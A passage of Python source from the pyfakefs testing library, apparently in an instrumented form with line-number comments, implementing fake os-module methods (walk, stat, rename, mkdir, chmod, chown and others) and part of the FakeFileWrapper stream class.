'Dummy implementation that returns an empty list - used by shutil.'
# line: 3427
return []
# line: 3429
if (sys.version_info >= (3, 5)):
# line: 3430
def scandir(self, path=''):
# line: 3442
'Return an iterator of DirEntry objects corresponding to the entries\n in the directory given by path.\n\n Args:\n path: path to the target directory within the fake filesystem.\n\n Returns:\n an iterator to an unsorted list of os.DirEntry objects for each entry in path.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 3443
return self.filesystem.ScanDir(path)
# line: 3445
def _ClassifyDirectoryContents(self, root):
# line: 3460
'Classify contents of a directory as files/directories.\n\n Args:\n root: (str) Directory to examine.\n\n Returns:\n (tuple) A tuple consisting of three values: the directory examined, a\n list containing all of the directory entries, and a list containing all\n of the non-directory entries. (This is the same format as returned by\n the os.walk generator.)\n\n Raises:\n Nothing on its own, but be ready to catch exceptions generated by\n underlying mechanisms like os.listdir.\n '
# line: 3461
dirs = []
# line: 3462
files = []
# line: 3463
for entry in self.listdir(root):
# line: 3464
if self.path.isdir(self.path.join(root, entry)):
# line: 3465
dirs.append(entry)
else:
# line: 3467
files.append(entry)
# line: 3468
return (root, dirs, files)
# line: 3470
def walk(self, top, topdown=True, onerror=None, followlinks=False):
# line: 3486
'Perform an os.walk operation over the fake filesystem.\n\n Args:\n top: root directory from which to begin walk.\n topdown: determines whether to return the tuples with the root as the\n first entry (True) or as the last, after all the child directory\n tuples (False).\n onerror: if not None, function which will be called to handle the\n os.error instance provided when os.listdir() fails.\n followlinks: if True, symbolic links are followed. New in pyfakefs 2.9.\n\n Yields:\n (path, directories, nondirectories) for top and each of its\n subdirectories. See the documentation for the builtin os module for\n further details.\n '
# line: 3487
def do_walk(top, topMost=False):
# line: 3488
top = self.path.normpath(top)
# line: 3489
if ((not topMost) and (not followlinks) and self.path.islink(top)):
# line: 3490
return
# line: 3491
try:
# line: 3492
top_contents = self._ClassifyDirectoryContents(top)
# line: 3493
except OSError as exc:
# line: 3494
top_contents = None
# line: 3495
if (onerror is not None):
# line: 3496
onerror(exc)
# line: 3498
if (top_contents is not None):
# line: 3499
if topdown:
# line: 3500
yield top_contents
# line: 3502
for directory in top_contents[1]:
# line: 3503
if ((not followlinks) and self.path.islink(directory)):
# line: 3504
continue
# line: 3505
for contents in do_walk(self.path.join(top, directory)):
# line: 3506
yield contents
# line: 3508
if (not topdown):
# line: 3509
yield top_contents
# line: 3511
return do_walk(top, topMost=True)
# line: 3514
def readlink(self, path, dir_fd=None):
# line: 3530
'Read the target of a symlink.\n\n Args:\n path: Symlink to read the target of.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Returns:\n the string representing the path to which the symbolic link points.\n\n Raises:\n TypeError: if `path` is None\n OSError: (with errno=ENOENT) if path is not a valid path, or\n (with errno=EINVAL) if path is valid, but is not a symlink.\n '
# line: 3531
path = self._path_with_dir_fd(path, self.readlink, dir_fd)
# line: 3532
return self.filesystem.ReadLink(path)
# line: 3534
def stat(self, entry_path, dir_fd=None, follow_symlinks=None):
# line: 3551
"Return the os.stat-like tuple for the FakeFile object of entry_path.\n\n Args:\n entry_path: path to filesystem object to retrieve.\n dir_fd: (int) If not `None`, the file descriptor of a directory,\n with `entry_path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and `entry_path` points to a symlink,\n the link itself is changed instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n\n Returns:\n the FakeStatResult object corresponding to entry_path.\n\n Raises:\n OSError: if the filesystem object doesn't exist.\n "
# line: 3552
if (follow_symlinks is None):
# line: 3553
follow_symlinks = True
elif (sys.version_info < (3, 3)):
# line: 3555
raise TypeError("stat() got an unexpected keyword argument 'follow_symlinks'")
# line: 3556
entry_path = self._path_with_dir_fd(entry_path, self.stat, dir_fd)
# line: 3557
return self.filesystem.GetStat(entry_path, follow_symlinks)
# line: 3559
def lstat(self, entry_path, dir_fd=None):
# line: 3573
"Return the os.stat-like tuple for entry_path, not following symlinks.\n\n Args:\n entry_path: path to filesystem object to retrieve.\n dir_fd: If not `None`, the file descriptor of a directory, with `entry_path`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Returns:\n the FakeStatResult object corresponding to `entry_path`.\n\n Raises:\n OSError: if the filesystem object doesn't exist.\n "
# line: 3575
entry_path = self._path_with_dir_fd(entry_path, self.lstat, dir_fd)
# line: 3576
return self.filesystem.GetStat(entry_path, follow_symlinks=False)
# line: 3578
def remove(self, path, dir_fd=None):
# line: 3591
'Remove the FakeFile object at the specified file path.\n\n Args:\n path: Path to file to be removed.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if path points to a directory.\n OSError: if path does not exist.\n OSError: if removal failed.\n '
# line: 3592
path = self._path_with_dir_fd(path, self.remove, dir_fd)
# line: 3593
self.filesystem.RemoveFile(path)
# line: 3595
def unlink(self, path, dir_fd=None):
# line: 3608
'Remove the FakeFile object at the specified file path.\n\n Args:\n path: Path to file to be removed.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if path points to a directory.\n OSError: if path does not exist.\n OSError: if removal failed.\n '
# line: 3609
path = self._path_with_dir_fd(path, self.unlink, dir_fd)
# line: 3610
self.filesystem.RemoveFile(path)
# line: 3612
def rename(self, old_file_path, new_file_path, dir_fd=None):
# line: 3631
'Rename a FakeFile object at old_file_path to new_file_path,\n preserving all properties.\n Also replaces existing new_file_path object, if one existed (Unix only).\n\n Args:\n old_file_path: Path to filesystem object to rename.\n new_file_path: Path to where the filesystem object will live after this call.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `old_file_path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if old_file_path does not exist.\n OSError: if new_file_path is an existing directory.\n OSError: if new_file_path is an existing file (Windows only)\n OSError: if new_file_path is an existing file and could not be removed (Unix)\n OSError: if `dirname(new_file)` does not exist\n OSError: if the file would be moved to another filesystem (e.g. mount point)\n '
# line: 3632
old_file_path = self._path_with_dir_fd(old_file_path, self.rename, dir_fd)
# line: 3633
self.filesystem.RenameObject(old_file_path, new_file_path)
# line: 3635
if (sys.version_info >= (3, 3)):
# line: 3636
def replace(self, old_file_path, new_file_path):
# line: 3652
'Renames a FakeFile object at old_file_path to new_file_path,\n preserving all properties.\n Also replaces existing new_file_path object, if one existed.\n New in pyfakefs 3.0.\n\n Args:\n old_file_path: path to filesystem object to rename\n new_file_path: path to where the filesystem object will live after this call\n\n Raises:\n OSError: if old_file_path does not exist.\n OSError: if new_file_path is an existing directory.\n OSError: if new_file_path is an existing file and could not be removed\n OSError: if `dirname(new_file)` does not exist\n OSError: if the file would be moved to another filesystem (e.g. mount point)\n '
# line: 3653
self.filesystem.RenameObject(old_file_path, new_file_path, force_replace=True)
# line: 3655
def rmdir(self, target_directory, dir_fd=None):
# line: 3667
"Remove a leaf Fake directory.\n\n Args:\n target_directory: (str) Name of directory to remove.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `target_directory` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if target_directory does not exist or is not a directory,\n or as per FakeFilesystem.RemoveObject. Cannot remove '.'.\n "
# line: 3668
target_directory = self._path_with_dir_fd(target_directory, self.rmdir, dir_fd)
# line: 3669
self.filesystem.RemoveDirectory(target_directory)
# line: 3671
def removedirs(self, target_directory):
# line: 3680
'Remove a leaf fake directory and all empty intermediate ones.\n\n Args:\n target_directory: the directory to be removed.\n\n Raises:\n OSError: if target_directory does not exist or is not a directory.\n OSError: if target_directory is not empty.\n '
# line: 3681
target_directory = self.filesystem.NormalizePath(target_directory)
# line: 3682
directory = self.filesystem.ConfirmDir(target_directory)
# line: 3683
if directory.contents:
# line: 3684
raise OSError(errno.ENOTEMPTY, 'Fake Directory not empty', self.path.basename(target_directory))
else:
# line: 3687
self.rmdir(target_directory)
# line: 3688
(head, tail) = self.path.split(target_directory)
# line: 3689
if (not tail):
# line: 3690
(head, tail) = self.path.split(head)
# line: 3691
while (head and tail):
# line: 3692
head_dir = self.filesystem.ConfirmDir(head)
# line: 3693
if head_dir.contents:
# line: 3694
break
# line: 3696
self.filesystem.RemoveDirectory(head, allow_symlink=True)
# line: 3697
(head, tail) = self.path.split(head)
# line: 3699
def mkdir(self, dir_name, mode=PERM_DEF, dir_fd=None):
# line: 3714
"Create a leaf Fake directory.\n\n Args:\n dir_name: (str) Name of directory to create.\n Relative paths are assumed to be relative to '/'.\n mode: (int) Mode to create directory with. This argument defaults to\n 0o777. The umask is applied to this mode.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `dir_name` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if the directory name is invalid or parent directory is read only\n or as per FakeFilesystem.AddObject.\n "
# line: 3715
dir_name = self._path_with_dir_fd(dir_name, self.mkdir, dir_fd)
# line: 3716
self.filesystem.MakeDirectory(dir_name, mode)
# line: 3718
def makedirs(self, dir_name, mode=PERM_DEF, exist_ok=None):
# line: 3733
'Create a leaf Fake directory + create any non-existent parent dirs.\n\n Args:\n dir_name: (str) Name of directory to create.\n mode: (int) Mode to create directory (and any necessary parent\n directories) with. This argument defaults to 0o777. The umask is\n applied to this mode.\n exist_ok: (boolean) If exist_ok is False (the default), an OSError is\n raised if the target directory already exists. New in Python 3.2.\n New in pyfakefs 2.9.\n\n Raises:\n OSError: if the directory already exists and exist_ok=False, or as per\n `FakeFilesystem.CreateDirectory()`.\n '
# line: 3734
if (exist_ok is None):
# line: 3735
exist_ok = False
elif (sys.version_info < (3, 2)):
# line: 3737
raise TypeError("makedir() got an unexpected keyword argument 'exist_ok'")
# line: 3738
self.filesystem.MakeDirectories(dir_name, mode, exist_ok)
# line: 3740
def _path_with_dir_fd(self, path, fct, dir_fd):
# line: 3741
'Return the path considering dir_fd. Raise on nmvalid parameters.'
# line: 3742
if (dir_fd is not None):
# line: 3743
if (sys.version_info < (3, 3)):
# line: 3744
raise TypeError(("%s() got an unexpected keyword argument 'dir_fd'" % fct.__name__))
# line: 3747
real_fct = getattr(os, fct.__name__)
# line: 3748
if (real_fct not in self.supports_dir_fd):
# line: 3749
raise NotImplementedError('dir_fd unavailable on this platform')
# line: 3750
if isinstance(path, int):
# line: 3751
raise ValueError(("%s: Can't specify dir_fd without matching path" % fct.__name__))
# line: 3753
if (not self.path.isabs(path)):
# line: 3754
return self.path.join(self.filesystem.GetOpenFile(dir_fd).GetObject().GetPath(), path)
# line: 3756
return path
# line: 3758
def access(self, path, mode, dir_fd=None, follow_symlinks=None):
# line: 3774
'Check if a file exists and has the specified permissions.\n\n Args:\n path: (str) Path to the file.\n mode: (int) Permissions represented as a bitwise-OR combination of\n os.F_OK, os.R_OK, os.W_OK, and os.X_OK.\n dir_fd: If not `None`, the file descriptor of a directory, with `path`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and `path` points to a symlink,\n the link itself is queried instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n\n Returns:\n bool, `True` if file is accessible, `False` otherwise.\n '
# line: 3775
if ((follow_symlinks is not None) and (sys.version_info < (3, 3))):
# line: 3776
raise TypeError("access() got an unexpected keyword argument 'follow_symlinks'")
# line: 3777
path = self._path_with_dir_fd(path, self.access, dir_fd)
# line: 3778
try:
# line: 3779
stat_result = self.stat(path, follow_symlinks=follow_symlinks)
# line: 3780
except OSError as os_error:
# line: 3781
if (os_error.errno == errno.ENOENT):
# line: 3782
return False
# line: 3783
raise
# line: 3784
return ((mode & ((stat_result.st_mode >> 6) & 7)) == mode)
# line: 3786
def chmod(self, path, mode, dir_fd=None, follow_symlinks=None):
# line: 3798
'Change the permissions of a file as encoded in integer mode.\n\n Args:\n path: (str) Path to the file.\n mode: (int) Permissions.\n dir_fd: If not `None`, the file descriptor of a directory, with `path`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and `path` points to a symlink,\n the link itself is queried instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n '
# line: 3799
if (follow_symlinks is None):
# line: 3800
follow_symlinks = True
elif (sys.version_info < (3, 3)):
# line: 3802
raise TypeError("chmod() got an unexpected keyword argument 'follow_symlinks'")
# line: 3803
path = self._path_with_dir_fd(path, self.chmod, dir_fd)
# line: 3804
self.filesystem.ChangeMode(path, mode, follow_symlinks)
# line: 3806
def lchmod(self, path, mode):
# line: 3813
'Change the permissions of a file as encoded in integer mode.\n If the file is a link, the permissions of the link are changed.\n\n Args:\n path: (str) Path to the file.\n mode: (int) Permissions.\n '
# line: 3814
if self.filesystem.is_windows_fs:
# line: 3815
raise (NameError, "name 'lchmod' is not defined")
# line: 3816
self.filesystem.ChangeMode(path, mode, follow_symlinks=False)
# line: 3818
def utime(self, path, times=None, ns=None, dir_fd=None, follow_symlinks=None):
# line: 3842
'Change the access and modified times of a file.\n\n Args:\n path: (str) Path to the file.\n times: 2-tuple of int or float numbers, of the form (atime, mtime) \n which is used to set the access and modified times in seconds. \n If None, both times are set to the current time.\n ns: 2-tuple of int numbers, of the form (atime, mtime) which is \n used to set the access and modified times in nanoseconds. \n If None, both times are set to the current time.\n New in Python 3.3. New in pyfakefs 3.3.\n dir_fd: If not `None`, the file descriptor of a directory, with `path`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and `path` points to a symlink,\n the link itself is queried instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n \n Raises:\n TypeError: If anything other than the expected types is \n specified in the passed `times` or `ns` tuple, \n or if the tuple length is not equal to 2.\n ValueError: If both times and ns are specified.\n '
# line: 3843
if (follow_symlinks is None):
# line: 3844
follow_symlinks = True
elif (sys.version_info < (3, 3)):
# line: 3846
raise TypeError("utime() got an unexpected keyword argument 'follow_symlinks'")
# line: 3847
path = self._path_with_dir_fd(path, self.utime, dir_fd)
# line: 3848
if ((ns is not None) and (sys.version_info < (3, 3))):
# line: 3849
raise TypeError("utime() got an unexpected keyword argument 'ns'")
# line: 3851
self.filesystem.UpdateTime(path, times, ns, follow_symlinks)
# line: 3853
def chown(self, path, uid, gid, dir_fd=None, follow_symlinks=None):
# line: 3872
'Set ownership of a faked file.\n\n Args:\n path: (str) Path to the file or directory.\n uid: (int) Numeric uid to set the file or directory to.\n gid: (int) Numeric gid to set the file or directory to.\n dir_fd: (int) If not `None`, the file descriptor of a directory,\n with `path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n follow_symlinks: (bool) If `False` and path points to a symlink,\n the link itself is changed instead of the linked object.\n New in Python 3.3. New in pyfakefs 3.0.\n\n Raises:\n OSError: if path does not exist.\n\n `None` is also allowed for `uid` and `gid`. This permits `os.rename` to\n use `os.chown` even when the source file `uid` and `gid` are `None` (unset).\n '
# line: 3873
if (follow_symlinks is None):
# line: 3874
follow_symlinks = True
elif (sys.version_info < (3, 3)):
# line: 3876
raise TypeError("chown() got an unexpected keyword argument 'follow_symlinks'")
# line: 3877
path = self._path_with_dir_fd(path, self.chown, dir_fd)
# line: 3878
try:
# line: 3879
file_object = self.filesystem.ResolveObject(path, follow_symlinks, allow_fd=True)
# line: 3880
except IOError as io_error:
# line: 3881
if (io_error.errno == errno.ENOENT):
# line: 3882
raise OSError(errno.ENOENT, 'No such file or directory in fake filesystem', path)
# line: 3885
raise
# line: 3886
if (not ((isinstance(uid, int) or (uid is None)) and (isinstance(gid, int) or (gid is None)))):
# line: 3888
raise TypeError('An integer is required')
# line: 3889
if (uid != (-1)):
# line: 3890
file_object.st_uid = uid
# line: 3891
if (gid != (-1)):
# line: 3892
file_object.st_gid = gid
# line: 3894
def mknod(self, filename, mode=None, device=None, dir_fd=None):
# line: 3914
"Create a filesystem node named 'filename'.\n\n Does not support device special files or named pipes as the real os\n module does.\n\n Args:\n filename: (str) Name of the file to create\n mode: (int) Permissions to use and type of file to be created.\n Default permissions are 0o666. Only the stat.S_IFREG file type\n is supported by the fake implementation. The umask is applied\n to this mode.\n device: not supported in fake implementation\n dir_fd: If not `None`, the file descriptor of a directory,\n with `filename` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if called with unsupported options or the file can not be\n created.\n "
# line: 3915
if self.filesystem.is_windows_fs:
# line: 3916
raise (AttributeError, "module 'os' has no attribute 'mknode'")
# line: 3917
if (mode is None):
# line: 3918
mode = (stat.S_IFREG | PERM_DEF_FILE)
# line: 3919
if (device or (not (mode & stat.S_IFREG))):
# line: 3920
raise OSError(errno.ENOENT, 'Fake os mknod implementation only supports regular files.')
# line: 3924
filename = self._path_with_dir_fd(filename, self.mknod, dir_fd)
# line: 3925
(head, tail) = self.path.split(filename)
# line: 3926
if (not tail):
# line: 3927
if self.filesystem.Exists(head):
# line: 3928
raise OSError(errno.EEXIST, ('Fake filesystem: %s: %s' % (os.strerror(errno.EEXIST), filename)))
# line: 3930
raise OSError(errno.ENOENT, ('Fake filesystem: %s: %s' % (os.strerror(errno.ENOENT), filename)))
# line: 3932
if (tail in ('.', u'.', '..', u'..')):
# line: 3933
raise OSError(errno.ENOENT, ('Fake fileystem: %s: %s' % (os.strerror(errno.ENOENT), filename)))
# line: 3935
if self.filesystem.Exists(filename):
# line: 3936
raise OSError(errno.EEXIST, ('Fake fileystem: %s: %s' % (os.strerror(errno.EEXIST), filename)))
# line: 3938
try:
# line: 3939
self.filesystem.AddObject(head, FakeFile(tail, (mode & (~ self.filesystem.umask)), filesystem=self.filesystem))
# line: 3942
except IOError as e:
# line: 3943
raise OSError(e.errno, ('Fake filesystem: %s: %s' % (os.strerror(e.errno), filename)))
# line: 3946
def symlink(self, link_target, path, dir_fd=None):
# line: 3958
'Creates the specified symlink, pointed at the specified link target.\n\n Args:\n link_target: The target of the symlink.\n path: Path to the symlink to create.\n dir_fd: If not `None`, the file descriptor of a directory,\n with `link_target` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Raises:\n OSError: if the file already exists.\n '
# line: 3959
link_target = self._path_with_dir_fd(link_target, self.symlink, dir_fd)
# line: 3960
self.filesystem.CreateLink(path, link_target, create_missing_dirs=False)
# line: 3962
def link(self, oldpath, newpath, dir_fd=None):
# line: 3980
"Create a hard link at new_path, pointing at old_path.\n New in pyfakefs 2.9.\n\n Args:\n old_path: An existing link to the target file.\n new_path: The destination path to create a new link at.\n dir_fd: If not `None`, the file descriptor of a directory, with `oldpath`\n being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Returns:\n the FakeFile object referred to by `oldpath`.\n\n Raises:\n OSError: if something already exists at new_path.\n OSError: if the parent directory doesn't exist.\n OSError: if on Windows before Python 3.2.\n "
# line: 3981
oldpath = self._path_with_dir_fd(oldpath, self.link, dir_fd)
# line: 3982
self.filesystem.CreateHardLink(oldpath, newpath)
# line: 3984
def fsync(self, file_des):
# line: 3994
'Perform fsync for a fake file (in other words, do nothing).\n New in pyfakefs 2.9.\n\n Args:\n file_des: file descriptor of the open file.\n\n Raises:\n OSError: file_des is an invalid file descriptor.\n TypeError: file_des is not an integer.\n '
# line: 3996
self.filesystem.GetOpenFile(file_des)
# line: 3998
def fdatasync(self, file_des):
# line: 4008
'Perform fdatasync for a fake file (in other words, do nothing).\n New in pyfakefs 2.9.\n\n Args:\n file_des: file descriptor of the open file.\n\n Raises:\n OSError: file_des is an invalid file descriptor.\n TypeError: file_des is not an integer.\n '
# line: 4010
self.filesystem.GetOpenFile(file_des)
# line: 4012
def __getattr__(self, name):
# line: 4013
'Forwards any unfaked calls to the standard os module.'
# line: 4014
return getattr(self._os_module, name)
# line: 4017
class FakeIoModule(object):
# line: 4026
'Uses FakeFilesystem to provide a fake io module replacement.\n New in pyfakefs 2.9.\n\n Currently only used to wrap `io.open()` which is an alias to `open()`.\n\n You need a fake_filesystem to use this:\n filesystem = fake_filesystem.FakeFilesystem()\n my_io_module = fake_filesystem.FakeIoModule(filesystem)\n '
# line: 4028
def __init__(self, filesystem):
# line: 4032
'\n Args:\n filesystem: FakeFilesystem used to provide file system information\n '
# line: 4033
self.filesystem = filesystem
# line: 4034
self._io_module = io
# line: 4036
def open(self, file_path, mode='r', buffering=(-1), encoding=None, errors=None, newline=None, closefd=True, opener=None):
# line: 4040
'Redirect the call to FakeFileOpen.\n See FakeFileOpen.Call() for description.\n '
# line: 4041
if ((opener is not None) and (sys.version_info < (3, 3))):
# line: 4042
raise TypeError("open() got an unexpected keyword argument 'opener'")
# line: 4043
fake_open = FakeFileOpen(self.filesystem, use_io=True)
# line: 4044
return fake_open(file_path, mode, buffering, encoding, errors, newline, closefd, opener)
# line: 4046
def __getattr__(self, name):
# line: 4047
'Forwards any unfaked calls to the standard io module.'
# line: 4048
return getattr(self._io_module, name)
# line: 4051
class FakeFileWrapper(object):
# line: 4056
'Wrapper for a stream object for use by a FakeFile object.\n\n If the wrapper has any data written to it, it will propagate to\n the FakeFile object on close() or flush().\n '
# line: 4057
def __init__(self, file_object, file_path, update=False, read=False, append=False, delete_on_close=False, filesystem=None, newline=None, binary=True, closefd=True, encoding=None, errors=None, raw_io=False, is_stream=False, use_io=True):
# line: 4061
self._file_object = file_object
# line: 4062
self._file_path = file_path
# line: 4063
self._append = append
# line: 4064
self._read = read
# line: 4065
self.allow_update = update
# line: 4066
self._closefd = closefd
# line: 4067
self._file_epoch = file_object.epoch
# line: 4068
self.raw_io = raw_io
# line: 4069
self._binary = binary
# line: 4070
self.is_stream = is_stream
# line: 4071
contents = file_object.byte_contents
# line: 4072
self._encoding = encoding
# line: 4073
errors = (errors or 'strict')
# line: 4074
if encoding:
# line: 4075
file_wrapper = FakeFileWrapper(file_object, file_path, update, read, append, delete_on_close=False, filesystem=filesystem, newline=None, binary=True, closefd=closefd, is_stream=True)
# line: 4079
codec_info = codecs.lookup(encoding)
# line: 4080
self._io = codecs.StreamReaderWriter(file_wrapper, codec_info.streamreader, codec_info.streamwriter, errors)
else:
# line: 4083
if ((not binary) and (sys.version_info >= (3, 0))):
# line: 4084
io_class = io.StringIO
else:
# line: 4086
io_class = io.BytesIO
# line: 4087
io_args = ({} if binary else {'newline': newline, })
# line: 4088
if (contents and (not binary)):
# line: 4089
contents = contents.decode((encoding or locale.getpreferredencoding(False)), errors=errors)
# line: 4091
if (contents and (not update)):
# line: 4092
self._io = io_class(contents, **io_args)
else:
# line: 4094
self._io = io_class(**io_args)
# line: 4096
if contents:
# line: 4097
if update:
# line: 4098
if (not encoding):
# line: 4099
self._io.write(contents)
# line: 4100
if (not append):
# line: 4101
self._io.seek(0)
else:
# line: 4103
self._read_whence = 0
# line: 4104
if (read and (not use_io)):
# line: 4105
self._read_seek = 0
else:
# line: 4107
self._read_seek = self._io.tell()
else:
# line: 4109
self._read_whence = 0
# line: 4110
self._read_seek = 0
# line: 4112
if delete_on_close:
# line: 4113
assert filesystem, 'delete_on_close=True requires filesystem'
# line: 4114
self._filesystem = filesystem
# line: 4115
self.delete_on_close = delete_on_close
# line: 4118
self.name = file_object.opened_as
# line: 4119
self.filedes = None
# line: 4121
def __enter__(self):
# line: 4122
"To support usage of this fake file with the 'with' statement."
# line: 4123
return self
# line: 4125
def __exit__(self, type, value, traceback):
# line: 4126
"To support usage of this fake file with the 'with' statement."
# line: 4127
self.close()
# line: 4129
def _raise(self, message):
# line: 4130
if self.raw_io:
# line: 4131
raise OSError(errno.EBADF, message)
# line: 4132
if (sys.version_info < (3, 0)):
# line: 4133
raise IOError(message)
# line: 4134
raise io.UnsupportedOperation(message)
# line: 4136
def GetObject(self):
# line: 4137
'Return the FakeFile object that is wrapped by the current instance.'
# line: 4138
return self._file_object
# line: 4140
def fileno(self):
# line: 4141
'Return the file descriptor of the file object.'
# line: 4142
return self.filedes
# line: 4144
def close(self):
# line: 4145
'Close the file.'
# line: 4147
if (self not in self._filesystem.open_files):
# line: 4148
return
# line: 4150
if (self.allow_update and (not self.raw_io)):
# line: 4151
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4152
if self._closefd:
# line: 4153
self._filesystem.CloseOpenFile(self.filedes)
# line: 4154
if self.delete_on_close:
# line: 4155
self._filesystem.RemoveObject(self.GetObject().GetPath())
# line: 4157
def flush(self):
# line: 4158
"Flush file contents to 'disk'."
# line: 4159
self._check_open_file()
# line: 4160
if self.allow_update:
# line: 4161
self._io.flush()
# line: 4162
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4163
self._file_epoch = self._file_object.epoch
# line: 4165
def seek(self, offset, whence=0):
# line: 4166
"Move read/write pointer in 'file'."
# line: 4167
self._check_open_file()
# line: 4168
if (not self._append):
# line: 4169
self._io.seek(offset, whence)
else:
# line: 4171
self._read_seek = offset
# line: 4172
self._read_whence = whence
# line: 4173
if (not self.is_stream):
# line: 4174
self.flush()
# line: 4176
def tell(self):
# line: 4181
"Return the file's current position.\n\n Returns:\n int, file's current position in bytes.\n "
# line: 4182
self._check_open_file()
# line: 4183
self._flush_for_read()
# line: 4184
if (not self._append):
# line: 4185
return self._io.tell()
# line: 4186
if self._read_whence:
# line: 4187
write_seek = self._io.tell()
# line: 4188
self._io.seek(self._read_seek, self._read_whence)
# line: 4189
self._read_seek = self._io.tell()
# line: 4190
self._read_whence = 0
# line: 4191
self._io.seek(write_seek)
# line: 4192
return self._read_seek
# line: 4194
def _flush_for_read(self):
# line: 4196
if self._flushes_after_read():
# line: 4197
self.flush()
# line: 4199
def _flushes_after_read(self):
# line: 4200
return ((not self.is_stream) and ((not self._filesystem.is_windows_fs) or (sys.version_info[0] > 2)))
# line: 4204
def _sync_io(self):
# line: 4205
'Update the stream with changes to the file object contents.'
# line: 4206
if (self._file_epoch == self._file_object.epoch):
# line: 4207
return
# line: 4209
if isinstance(self._io, io.BytesIO):
# line: 4210
contents = self._file_object.byte_contents
else:
# line: 4212
contents = self._file_object.contents
# line: 4214
is_stream_reader_writer = isinstance(self._io, codecs.StreamReaderWriter)
# line: 4215
if is_stream_reader_writer:
# line: 4216
self._io.stream.allow_update = True
# line: 4217
whence = self._io.tell()
# line: 4218
self._io.seek(0)
# line: 4219
self._io.truncate()
# line: 4220
self._io.write(contents)
# line: 4221
if self._append:
# line: 4222
self._io.seek(0, os.SEEK_END)
else:
# line: 4224
self._io.seek(whence)
# line: 4226
if is_stream_reader_writer:
# line: 4227
self._io.stream.allow_update = False
# line: 4228
self._file_epoch = self._file_object.epoch
# line: 4230
def _ReadWrapper(self, name):
# line: 4241
'Wrap a stream attribute in a read wrapper.\n\n Returns a read_wrapper which tracks our own read pointer since the\n stream object has no concept of a different read and write pointer.\n\n Args:\n name: the name of the attribute to wrap. Should be a read call.\n\n Returns:\n either a read_error or read_wrapper function.\n '
# line: 4242
io_attr = getattr(self._io, name)
# line: 4244
def read_wrapper(*args, **kwargs):
# line: 4256
"Wrap all read calls to the stream object.\n\n We do this to track the read pointer separate from the write\n pointer. Anything that wants to read from the stream object\n while we're in append mode goes through this.\n\n Args:\n *args: pass through args\n **kwargs: pass through kwargs\n Returns:\n Wrapped stream object method\n "
# line: 4257
self._io.seek(self._read_seek, self._read_whence)
# line: 4258
ret_value = io_attr(*args, **kwargs)
# line: 4259
self._read_seek = self._io.tell()
# line: 4260
self._read_whence = 0
# line: 4261
self._io.seek(0, 2)
# line: 4262
return ret_value
# line: 4264
return read_wrapper
# line: 4266
def _OtherWrapper(self, name, writing):
# line: 4274
'Wrap a stream attribute in an other_wrapper.\n\n Args:\n name: the name of the stream attribute to wrap.\n\n Returns:\n other_wrapper which is described below.\n '
# line: 4275
io_attr = getattr(self._io, name)
# line: 4277
def other_wrapper(*args, **kwargs):
# line: 4289
'Wrap all other calls to the stream Object.\n\n We do this to track changes to the write pointer. Anything that\n moves the write pointer in a file open for appending should move\n the read pointer as well.\n\n Args:\n *args: pass through args\n **kwargs: pass through kwargs\n Returns:\n Wrapped stream object method\n '
# line: 4290
write_seek = self._io.tell()
# line: 4291
ret_value = io_attr(*args, **kwargs)
# line: 4292
if (write_seek != self._io.tell()):
# line: 4293
self._read_seek = self._io.tell()
# line: 4294
self._read_whence = 0
# line: 4295
if ((not writing) or (sys.version_info >= (3,))):
# line: 4296
return ret_value
# line: 4298
return other_wrapper
# line: 4300
def _TruncateWrapper(self):
# line: 4305
'Wrap truncate() to allow flush after truncate.\n\n Returns:\n wrapper which is described below.\n '
# line: 4306
io_attr = getattr(self._io, 'truncate')
# line: 4308
def truncate_wrapper(*args, **kwargs):
# line: 4309
'Wrap truncate call to call flush after truncate.'
# line: 4310
if self._append:
# line: 4311
self._io.seek(self._read_seek, self._read_whence)
# line: 4312
size = io_attr(*args, **kwargs)
# line: 4313
self.flush()
# line: 4314
if (not self.is_stream):
# line: 4315
self._file_object.SetSize(size)
# line: 4316
buffer_size = len(self._io.getvalue())
# line: 4317
if (buffer_size < size):
# line: 4318
self._io.seek(buffer_size)
# line: 4319
self._io.write(('\x00' * (size - buffer_size)))
# line: 4320
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4321
if (sys.version_info >= (3,)):
# line: 4322
return size
# line: 4324
return truncate_wrapper
# line: 4326
def _WriteWrapper(self, name):
# line: 4331
'Wrap write() to adapt return value for Python 2.\n\n Returns:\n wrapper which is described below.\n '
# line: 4332
io_attr = getattr(self._io, name)
# line: 4334
def write_wrapper(*args, **kwargs):
# line: 4335
'Wrap trunctae call to call flush after truncate.'
# line: 4336
ret_value = io_attr(*args, **kwargs)
# line: 4337
if (sys.version_info >= (3,)):
